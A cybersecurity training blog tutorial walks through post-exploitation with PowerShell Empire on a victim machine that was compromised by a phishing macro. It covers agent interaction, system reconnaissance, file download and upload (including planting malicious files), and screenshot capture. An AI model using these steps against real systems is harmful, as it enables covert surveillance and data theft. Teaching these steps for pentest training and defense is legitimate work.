Powershell Empire Stagers 2: Controlling the Victim’s Machine

June 10, 2016 | Views: 21775

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hello fellow Cybrarians,

In the last tutorial, Powershell Empire Stagers 1: Phishing with an Office Macro and Evading AVs, we covered creating a malicious macro and sending it to the victim.

Today, we’re going to learn how to move around the system, once the connection is made, and gather some information about the target.

Terminology

Before we go deeper in the world of PowerShell Empire, let’s clarify some common terminology:

1- Stager: is considered a payload that can be executed on the target’s machine in order to establish a connection between the attacker and the target’s machine.

2- Agent: is the target’s machine that we are controlling

Tutorial Requirements

1- Empire installed on Kali Linux — > See Part 1

2- Another machine to emulate the target’s s machine (Mac or Windows OS)

 

Let’s begin…

 

Step 1: Get the Connection

When the victim opens the file, you should get a connection back – in a form of green colored message says “Initial agent [name of the agent] now active”

em1.PNG

 

Step 2: Show Agent’s Information

Type Agent to get the name of the agent, along with some basic information about the hacked system

em2.PNG

In the image above, we can see that we got the internal IP address of the victim, name of his machine and when the file was open.

 

Step 3: Interact with the System

Type Help to view all the options that come with “agent”

    >>help

At this point, we’re only interested in interacting with the system

em4.PNG

 

To interact with the system, type :

>>> interact NameOfTheMachine

em5.PNG

 

Step 4 : Control the Machine

We can control the hacked machine through variety of commands. Here are 7 important commands for this mission:

1- sysinfo: to get information about the system (the type of Operating System, process ID and IP address). In this case, it’s an internal IP.

em6.PNG

 

2- ipconfig : to get information about the Default Gateway, which helps in hacking the wireless or wired connection. By checking the ip address in your browser, you know what type of router the victim is using.

em9.PNG

 

3- tasklist : lists all the programs and services on the machine

ta.JPG

 

4- ps: displays information about a selection of the active processes in the system. It can be VERY helpful in customizing specific attacks for persistence.

em10.PNG

 

5- pwd: to show the path of the current directory

em11.PNG

 

You can switch to a User’s Directory by typing

>>>  cd C:WindowsUsers

>>>> cd Desktop

em12.PNG

em13.PNG

em14.PNG

 

6- Download or Upload Files

One of the great things about Empire is that you can download files from the hacked system or upload them to the hacked system (this can be used to replace clean files with malicious ones – as with Social Engineering efforts)

To download, type:

>>>> Download NameofTheFile.doc

  • Note: Extensions of files are important

em16.PNG

 

The file will be saved in the Empire Directory under Downloads

em17.PNG

Also, we can upload files to the victim’s machine

To upload, type:

>>> upload nameOfFile

 

7- Screenshot

We can take a screenshot of the system desktop by typing

>>> usemodule/collection/screenshot

>>> execute

em18.PNG
Once the command is executed, it will take sometime to finish the process

em20.PNG

 

Once the screenshot is taken, the picture will be saved under the Empire/ Downloads/ Screenshot directory

1.JPG

 

As you can see, PowerShell Empire is very powerful tool in gathering information about the target. It’s a very stealthy and helpful way for a hacker/pentester to customize specific attacks in order to a gain foothold on the network.

That’ all for this tutorial. Stay tuned for  more interesting topics and thank you for reading.

 

@Z33MAXX

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
18 Comments
  1. I was wondering if you upload file to victim test machine desktop.
    How to remotely execute the uploaded file?

  2. MUY BUENO..
    SALUDOS DESDE VENEZUELA

  3. Cool article, very helpful. I am using this to try and push for some user security training for our staff, as it looks like the only way to stop this is for you to recognize the phishing attempt.

    • James, also look at KnowBe4 security training – very in depth and does what you are looking for – it is subscription based, so you can tailor an exercise to meet your needs on an ongoing basis instead of just fire and forget like most people do when they “learn” their once a year training, if that.

Page 3 of 3«123
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel